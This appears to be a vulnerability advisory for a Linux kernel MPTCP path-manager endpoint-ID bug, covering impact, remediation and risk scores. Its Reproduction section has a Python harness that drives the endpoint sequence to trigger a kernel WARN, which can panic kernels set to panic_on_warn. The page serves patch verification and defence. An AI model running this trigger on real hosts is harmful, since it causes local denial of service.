Linux Kernel MPTCP PM In-Kernel Endpoint ID Availability Vulnerability

Vulnerability

A bug in the in-kernel path manager (PM) of the Linux kernel's Multipath TCP (MPTCP) implementation has been fixed. The in-kernel PM keeps, for each connection, a record of which endpoint IDs are currently in use; that record was not kept consistent when an endpoint was removed and then recreated under the same ID with the 'subflow' flag and later given the 'fullmesh' flag. The sequence leaves the PM's view of the ID's availability wrong and makes the kernel hit a warning while handling the connection. The bug was found by Syzkaller, the coverage-guided kernel fuzzer, whose reproducer performs exactly that sequence of endpoint and connection operations. The "attribute type N has an invalid length" lines that accompany such fuzzer reports are printed by the kernel's generic netlink attribute validation for the fuzzer's own oddly sized requests; they are log noise around the finding, not the defect itself.

Impact

The practical effect is a reachable kernel warning (WARN) and inconsistent endpoint-ID bookkeeping in the in-kernel PM for the affected connection. On kernels running with panic_on_warn, which is how fuzzers and some hardened deployments are configured, a reachable WARN is a kernel panic, that is, a local denial of service. Triggering it requires configuring MPTCP endpoints through the PM's netlink interface, which needs CAP_NET_ADMIN in the network namespace; on hosts that allow unprivileged user namespaces, any local user can obtain that capability in a namespace of their own. The netlink "invalid length" and "bytes leftover after parsing attributes" messages seen in the fuzzer log are the kernel's generic attribute validation rejecting the fuzzer's malformed requests, not an effect of this bug.

Reproduction

On a host where the in-kernel PM is active, create an endpoint for a local address A with no flags and note its ID. Open an MPTCP connection whose initial subflow is sourced from A and keep that connection open for the rest of the sequence. Delete the endpoint; the PM tears down the subflows associated with it. Recreate the endpoint with the same ID, this time with the 'subflow' flag, and then change it to add the 'fullmesh' flag. On an unfixed kernel this last step triggers the warning about the endpoint ID's availability; on a fixed kernel the same sequence completes silently, which is the check to run after patching. Do this only on a disposable machine: with panic_on_warn set, the warning crashes the kernel.
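The sequence above as a small harness, added here as an example; it is not part of the advisory or of the kernel project's tooling. It assumes iproute2's `ip mptcp endpoint` commands, endpoint ID 1, the addresses 10.0.1.1 and 10.0.1.2 on the loopback device of a throwaway network namespace named mptcp-repro, and a listener on port 8443; none of these are given on the page. It also carries a triage helper that separates a kernel WARN from the netlink attribute-validation messages a fuzzer log contains, run over a constructed sample. Without arguments it only prints the plan and the sample triage; with --run it needs root and a kernel with CONFIG_MPTCP, and should be used only on a disposable VM because the warning can panic a kernel booted with panic_on_warn.

```python
#!/usr/bin/env python3
"""Added example (not from the advisory or the kernel project): drives the
endpoint re-creation sequence around a live MPTCP connection and triages dmesg.

Assumptions not given on the page: iproute2 'ip mptcp endpoint' is used,
the endpoint ID is 1, the addresses 10.0.1.1 / 10.0.1.2 sit on lo inside a
throwaway netns 'mptcp-repro', and the listener uses port 8443."""
import re
import socket
import subprocess
import sys

IPPROTO_MPTCP = 262                      # Linux value; socket.IPPROTO_MPTCP needs Python >= 3.10
NS = "mptcp-repro"                       # assumed throwaway network namespace
ADDR_A, ADDR_B = "10.0.1.1", "10.0.1.2"  # assumed test addresses (A = the endpoint address)
ENDP_ID = 1                              # assumed ID; the page only says "the same ID"


def repro_commands(addr=ADDR_A, endp_id=ENDP_ID):
    """The endpoint operations of the Reproduction section as iproute2 argv lists.
    The connection from `addr` is opened between steps 1 and 2 by make_connection()."""
    return [
        ["ip", "mptcp", "endpoint", "add", addr, "id", str(endp_id)],             # 1: no flags
        ["ip", "mptcp", "endpoint", "del", "id", str(endp_id)],                   # 2: subflows torn down
        ["ip", "mptcp", "endpoint", "add", addr, "id", str(endp_id), "subflow"],  # 3: same ID, 'subflow'
        ["ip", "mptcp", "endpoint", "change", "id", str(endp_id), "fullmesh"],    # 4: add 'fullmesh'
    ]


# Printed by lib/nlattr.c when user space sends attributes of unexpected length.
# A fuzzer produces many of these; they describe its requests, not a kernel bug.
NLATTR_NOISE = ("has an invalid length", "bytes leftover after parsing attributes")
WARN_RE = re.compile(r"WARNING: CPU: \d+ PID: \d+ at (\S+)")

# Constructed sample with the shape of a fuzzer report; the WARN site and the
# symbol are placeholders, not values from the real report.
SAMPLE_DMESG = [
    "netlink: 'syz-executor.0': attribute type 2 has an invalid length.",
    "netlink: 4 bytes leftover after parsing attributes in process `syz-executor.0'.",
    "------------[ cut here ]------------",
    "WARNING: CPU: 0 PID: 4242 at net/mptcp/FILE.c:LINE placeholder_fn+0x1/0x1",
]


def triage_dmesg(lines):
    """Split kernel log lines into WARN sites (the finding) and netlink
    attribute-validation noise.  Returns (warn_sites, noise_count)."""
    sites, noise = [], 0
    for line in lines:
        if any(marker in line for marker in NLATTR_NOISE):
            noise += 1
        elif (m := WARN_RE.search(line)):
            sites.append(m.group(1))
    return sites, noise


def make_connection(local, remote, port=8443):
    """Open one MPTCP connection whose initial subflow is sourced from `local`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM, IPPROTO_MPTCP)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((remote, port))
    srv.listen(1)
    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM, IPPROTO_MPTCP)
    cli.bind((local, 0))                 # pin the initial subflow's source address to A
    cli.connect((remote, port))
    conn, _ = srv.accept()
    return srv, cli, conn


def dmesg_lines():
    return subprocess.run(["dmesg"], capture_output=True, text=True).stdout.splitlines()


def run_sequence():
    """Run the four steps with the connection held open (root, inside the netns)."""
    seen = len(dmesg_lines())
    steps = repro_commands()
    subprocess.run(steps[0], check=True)
    socks = make_connection(ADDR_A, ADDR_B)
    try:
        for cmd in steps[1:]:
            subprocess.run(cmd, check=True)
    finally:
        for s in socks:
            s.close()
    return triage_dmesg(dmesg_lines()[seen:])   # only lines produced by this run


def main():
    if "--in-ns" in sys.argv:                # re-executed inside NS by the --run branch
        sites, noise = run_sequence()
        print(f"WARN sites: {sites or 'none'}; netlink validation noise lines: {noise}")
    elif "--run" in sys.argv:
        subprocess.run(["ip", "netns", "add", NS], check=True)
        try:
            for cmd in (["ip", "link", "set", "lo", "up"],
                        ["ip", "addr", "add", ADDR_A + "/32", "dev", "lo"],
                        ["ip", "addr", "add", ADDR_B + "/32", "dev", "lo"]):
                subprocess.run(["ip", "netns", "exec", NS, *cmd], check=True)
            subprocess.run(["ip", "netns", "exec", NS, sys.executable, __file__, "--in-ns"])
        finally:
            subprocess.run(["ip", "netns", "del", NS])
    else:                                     # dry run: show the plan and the triage of the sample
        print("\n".join(" ".join(cmd) for cmd in repro_commands()))
        print("sample triage:", triage_dmesg(SAMPLE_DMESG))


if __name__ == "__main__":
    main()
```

Keeping both sides of the connection in one namespace is what makes the harness self-contained: the endpoint for A is looked up against the client's initial subflow, and the connection stays open across the delete, re-add and change so that the PM state of that live connection is what the last step operates on. Comparing the triage result before and after a kernel update is the post-patch check: an unfixed kernel reports a WARN site, a fixed one reports none.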

Remediation

The fix is in the mainline Linux kernel; upgrade to a kernel release that includes it. Distribution and stable kernels usually backport such fixes, so check the vendor advisory for the exact version rather than relying on the version number alone, and verify by running the reproduction sequence on the updated kernel. Where a kernel update cannot be applied promptly, reduce who can reach the trigger: it needs CAP_NET_ADMIN in the network namespace, so preventing unprivileged users from creating user namespaces (for example sysctl user.max_user_namespaces=0, or the distribution's equivalent knob) confines it to administrators. Hosts that do not need MPTCP can also disable it with sysctl net.mptcp.enabled=0; note that this setting is per network namespace.

Added: May 6, 2026, 12:56 PM
Updated: May 6, 2026, 12:56 PM

Vulnerability Rating

Custom Algorithm
spread: 9.0
impact: 0.6
exploitability: 4.3
remediation: 7.7
relevance: 7.6
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.